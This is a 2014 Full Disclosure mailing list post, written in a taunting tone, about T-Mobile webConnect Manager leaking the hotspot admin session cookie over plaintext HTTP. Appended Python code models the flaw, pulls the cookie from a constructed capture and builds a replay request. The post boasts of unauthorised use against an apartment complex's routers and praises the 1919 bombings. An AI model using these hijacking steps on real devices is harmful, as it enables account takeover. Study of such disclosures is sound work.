Full Disclosure mailing list archives
T-Mobile webConnect Manager sysauth cookie leak in plain text via http request
From: Americas Testkitchen <americaztestkitchen () gmail com>
Date: Sat, 14 Jun 2014 06:50:07 -0700
######## atk #1.txt ###################################################################

"...and it won't be the witches who'll be burning this time" -Blackbird Raum, Witches

Achtung!!! : T-Mobile webConnect Manager sysauth cookie leaked in plain text via http request.

Scope: webConnect Manager is the interface used for administration of MANY T-Mobile devices, including the highly-touted Samsung LTE Mobile Hotspot Pro. (actually decent hardware, but this chef doesn't know much about bowls, whisks, spoons and pressure cookers, only spices and herbs.) webConnect Manager has been in the wild via T-Mobile's crack security code-audit team and responsible for slowing down AmericasTestKitchen's interlinks via T-Mobile-sponsored zombie nets....so.....

Vendor Notification: None. Seriously.... ever hear of the secure flag you ninnies?

"someday we will bring you down, someday this will all come crashing right down so go on, with your life. We Will Bring YOU DOWN!" -Blackbird Raum "Honey in the Hair"

Timeline:
6.1.14 : found by Chef Samael
6.2.14 : (still 6.1.14 in Samael's tz) VRFY'd by Sous Chef: Nita
6.3.14 : canned POC developed by Chef Swedish, tested and used to propagate through weak routers of a large apartment complex, account data was retrieved and stored back to the devices' considerable storage.
6.3.14 : test successful, ownership of test subjects returned, NSA grade wipe of testing fiasco complete.
6.4.14 Dist. Schedule:
6.3.14 : POC distributed amongst chefs @ the Frothing Bunniculitis board of ATK.
6.3.14 : This is posted to:
6.14.14 : YOU

############ Americas Test Kitchen: Recipe 1 ##############################################

I) : Intro/Rant/Mission Statement

How Are You Gentlemen/Women?!? Welcome to Americas Test Kitchen, where all are invited to test, post ingredients and share the most delightful aspects of cooking, BBQ, baking. We @ ATK assume the participants will be somewhat seasoned chefs and able to concoct full recipes on their own with a minimal discussion of ingredients. Recipes that can be purchased with a Vietnamese dong are encouraged and are best cooked amongst/against other chefs (nicely now...). Have a wonderful and blessed day! Welcome to the kitchen! Join our community on the behemoth Frothing Bunniculitis Board. It is set up as a user and not a group for a reason. Don't ask to become a chef. We will ask you. Or you'll own US and bake a cake of your own. ;) Nothing wrong with a cook-off amongst friends :p

[code]Karma police, arrest this man he talks in maths. he's buzzing like a fridge. he's like a detuned radio. This is what you get this is what YOU get this is what you get when you mess with the... [/code]

Our internets are broken. We are all owners and owned. Hats are meaningless. Anti-Sec didn't work. We will give small token gifts to the goy and keep the fine wine for perfect pairings to go with undisclosed recipes. We do NOT provide canned exploits. Only a small dataset for those with eyes to see and minds that reciprocate. We are agent and agency. We refer to the works of Godel, Escher and Bach. We refer to Richard Dawkins. We refer to the Max Headroom Incident of 1987, amongst/against many, many other ideals, perspectives and subcultures within subcultures and shadows behind shadows. We refer now to you.

./propagate

Part 2. product info and review

Overview: T-Mobile webConnect Manager is a program developed BY T-Mobile. The most used version is 2.04.0030.0 with over 98% of all installations currently using this version. While about 89% of users of T-Mobile webConnect Manager come from the United States, it is also popular in Indonesia and Iran. (hi intel, but you guys know this already)

Ironic Re-views:

The Samsung LTE Mobile HotSpot Pro's Web interface is easy to use and offers access to all of its settings. Note how the router is locked to T-Mobile and won't accept a SIM card from a different carrier until it's unlocked. "dis ting hee-ya is mai favowit" - Dong Ngo/CNET

[code]peanutbutterjellyandabaseballbat[/code]

*Ed. Dong, there are those of us who would love your job and all the swag you get as a part of the gig....DONG

....don't be deceived by its name as the Samsung LTE Mobile HotSpot PRO is more than just your average mobile hotspot and is, in fact, something all road warriors might want to have in their arsenal. - JC Torres, SlashGear

*Ed. I couldn't have said it better. Still....

[code]peanutbutterjellyandabaseballbat[/code]

Part 3: discovery date jun 2-3 / historical greetz

On these 2 days in history:
June 2 1919: some great citizens and lovers of justice tried to level the playing field: https://en.wikipedia.org/wiki/1919_United_States_anarchist_bombings
June 3, 1968: Andy Warhol the American artist and a major driving force in the movement known as Pop art is shot and wounded in his New York film studio, The Factory, by actress Valerie Solanas who founded the "group" called S.C.U.M. (Society for Cutting up Men).
*Nita got a little too happy about this factoid methinks

*full disclosure: ATK is busy and some of us have lives so the following is nearing (but not quite) plagiarism of an identical issue on another WAP 300 years ago. This kind of shit should not be a factor nowadays. Infosuck 101.

The Goods -> BAKING SCENARIO:

An attacker may be able to cause the sysauth cookie to be leaked via a plaintext HTTP request. You can create a plaintext HTTP link to the Samsung LTE Mobile HotSpot as a local application icon. If an administrator is authenticated to the site over SSL and visits the application list, the browser will issue the plaintext, non-SSL request and automatically include the admin's current session token. A network attacker shouldn't have any trouble being able to capture this value via network sniffing and perform subsequent actions on the administrator's behalf via DUCT-TAPE.

*OUR WORDS: fire up your pcap of choice and grep http. use some duct tape (curl, expect, nc), I suggest you try a GET http://mobile.hotspot/www/apps/dongleweb/php/en/security/01_sim_pin.php

It's hilarious and disturbing to see the whole cookie: SID & Credential both pass in plain text through a directory called "security" while on the way to visit the sim card. SERIOUSLY?!?! Session hijacking via cookie wasn't even a considerable hack in '99. They have been selling and using this fskn "software" on a majority of their devices for years. We have not the time (we are rushing to market like you T-Mobile) nor the money to activate another T-Mobile device for yux. I highly suspect they are vuln on any device running the crap \\\\\\\

See all of you at the coffee shop! Keep a look out for those cute little red squares & know the admin page is loaded on a tab somewhere so they can monitor their data usage in real-time (IT WORKS SOMETIMES). There is plenty of time and places to wage attack on these.

Fix your chit T-Mobile: this is beyond unacceptable. I want to see @ least a fskn s flag patch by Friday. There's more.

FIX: DUCT TAPE!!: mac filtering
COUNTER DUCT TAPE!!: mac spoof (it works fine with this too) good.

....disconnected

References:
a) by habit capturing the first transaction with a new device. Login, passwd creation, ruleset application (where applicable) look for really really stupid ish like this. Make note of the default passwd (admin btw) and the way the device is associated with the network (last 8 of the MEID in this case)...etc etc...3rd grade ish
b)
i. http://www.wireshark.org/
ii. http://www.tcpdump.org/ and libpcap
iii. MTP Simulator 12.0 startpage it
iv. https://github.com/opentechinstitute/commotion-router/issues/33
v. ATK.

Thx everyone! Took 10x longer for us to agree what to say here than it did proving our perfect cookie recipe..u asshats are impossible.

Coming Soon: Ingredients for Flatulent Butt-slut stew

./hi black powder records & drater/n1nor/ron1n (We miss the old kitchen...come back yoda)
t-mobile tech support for the sexy internal conference line given to us on accident by one of the wonderful outsourced workers! Thanks himynameislindawitht-mobilecanihelpyou?/!!!!!! Any time Linda, any-time.
Hi @ tabis pankweev and his father.

./fuqz @ cipher <------u talk like u r a 3 year old having an apoplectic fit (thats from Chef Samael) Go make me a pah you myopic turd.
@ tmobile dev : for assisting in breaking OUR interwebs. grow up or get out -x

./h8 @ samsung for not honouring the insurance contract. missed payment by a day, lost service for 3 hours paid bill & insurance, drowned my device 3 days later and you told me to fsk off. Say hi 2 teh ghost of christmas past. literally. That was my xmas present you wankers. - sous chef Nita

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
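The mechanism the post complains about (a session cookie set without the Secure attribute, so the browser attaches it to a plaintext http:// request that anyone on the network can sniff and replay), as an added worked example that is not code from the post, from T-Mobile or from Samsung. The hostname mobile.hotspot, the 01_sim_pin.php path and the cookie names sysauth, SID and Credential are taken from the post; the cookie values, the Set-Cookie header shape and the captured request are constructed for the example, and the cookie-matching logic is a deliberately simplified version of RFC 6265 section 5.4 (exact host match, path prefix, Secure rule only).

```python
# Added example, not code from the post or the vendor. Models why a cookie
# without the Secure attribute rides along on a plaintext request, checks a
# Set-Cookie header for the missing flags, and pulls the session cookie out
# of a captured plaintext HTTP request the way a pcap + grep would show it.
from urllib.parse import urlsplit

# URL named in the post (plaintext http://).
HOTSPOT_URL = "http://mobile.hotspot/www/apps/dongleweb/php/en/security/01_sim_pin.php"

# Constructed Set-Cookie headers: the weak form (no Secure flag) and a hardened one.
# Cookie values are made up.
WEAK_SET_COOKIE = "sysauth=deadbeef0badf00d; Path=/"
FIXED_SET_COOKIE = "sysauth=deadbeef0badf00d; Path=/; Secure; HttpOnly"


def parse_set_cookie(header):
    """Split a Set-Cookie header into (name, value, attrs); flag attributes map to True."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, has_value, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_value else True
    return name.strip(), value.strip(), attrs


def missing_flags(header):
    """Hardening attributes absent from a Set-Cookie header ('secure', 'httponly')."""
    _, _, attrs = parse_set_cookie(header)
    return [flag for flag in ("secure", "httponly") if attrs.get(flag) is not True]


def cookies_browser_sends(jar, url):
    """Cookies a browser attaches to `url` from `jar`, a list of (host, set_cookie_header).

    Simplified RFC 6265 5.4 matching (assumption): exact host, path prefix, and the
    rule that a Secure cookie is only sent when the request scheme is https.
    """
    u = urlsplit(url)
    sent = {}
    for host, header in jar:
        name, value, attrs = parse_set_cookie(header)
        if host != u.hostname:
            continue
        if not (u.path or "/").startswith(attrs.get("path", "/")):
            continue
        if attrs.get("secure") is True and u.scheme != "https":
            continue  # Secure cookie stays home on plaintext HTTP
        sent[name] = value
    return sent


def cookies_from_capture(raw_request):
    """Pull Host, request target and Cookie values out of captured plaintext HTTP bytes."""
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *header_lines = head.split("\r\n")
    _method, target, _version = request_line.split(" ", 2)
    host, cookies = None, {}
    for line in header_lines:
        key, _, val = line.partition(":")
        key, val = key.strip().lower(), val.strip()
        if key == "host":
            host = val
        elif key == "cookie":
            for pair in val.split(";"):
                cname, _, cval = pair.strip().partition("=")
                if cname:
                    cookies[cname] = cval
    return {"host": host, "target": target, "cookies": cookies}


def build_replay(host, target, cookies):
    """Raw request bytes that reuse a sniffed session (the post's curl/nc "duct tape")."""
    cookie_header = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return f"GET {target} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie_header}\r\n\r\n".encode()


# Constructed capture: what a plaintext GET to the SIM-PIN page looks like on the wire.
CAPTURED_REQUEST = (
    b"GET /www/apps/dongleweb/php/en/security/01_sim_pin.php HTTP/1.1\r\n"
    b"Host: mobile.hotspot\r\n"
    b"Cookie: SID=deadbeef0badf00d; Credential=0123456789abcdef\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print("weak cookie missing:", missing_flags(WEAK_SET_COOKIE))
    print("fixed cookie missing:", missing_flags(FIXED_SET_COOKIE))
    weak_jar = [("mobile.hotspot", WEAK_SET_COOKIE)]
    fixed_jar = [("mobile.hotspot", FIXED_SET_COOKIE)]
    print("sent over http (weak):", cookies_browser_sends(weak_jar, HOTSPOT_URL))
    print("sent over http (fixed):", cookies_browser_sends(fixed_jar, HOTSPOT_URL))
    cap = cookies_from_capture(CAPTURED_REQUEST)
    print("sniffed from capture:", cap["cookies"])
    print(build_replay(cap["host"], cap["target"], cap["cookies"]).decode(), end="")
```

Run as-is it prints that the weak cookie lacks both Secure and HttpOnly, that the browser would attach it to the plaintext SIM-PIN URL while the hardened one is withheld, and the raw replay request an attacker on the same network could hand to nc or curl. The fix the post demands is the one-line difference between WEAK_SET_COOKIE and FIXED_SET_COOKIE on the server side.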
Current thread:
- T-Mobile webConnect Manager sysauth cookie leak in plain text via http request Americas Testkitchen (Jun 16)